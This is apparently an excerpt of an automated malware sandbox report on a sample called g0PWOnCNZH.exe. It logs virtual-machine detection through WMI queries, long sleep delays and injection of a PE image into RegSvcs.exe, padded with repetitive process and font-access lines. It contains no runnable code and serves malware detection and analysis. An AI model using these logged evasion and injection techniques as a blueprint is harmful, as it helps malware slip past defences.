            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe TID: 5960Thread sleep time: -40023s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exe TID: 5980Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 642Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeThread delayed: delay time: 40023Jump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: RegSvcs.exe, 00000001.00000003.292874133.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.528335523.0000000005B31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42C000Jump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42E000Jump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 6CB008Jump to behavior
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Users\user\Desktop\g0PWOnCNZH.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\g0PWOnCNZH.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
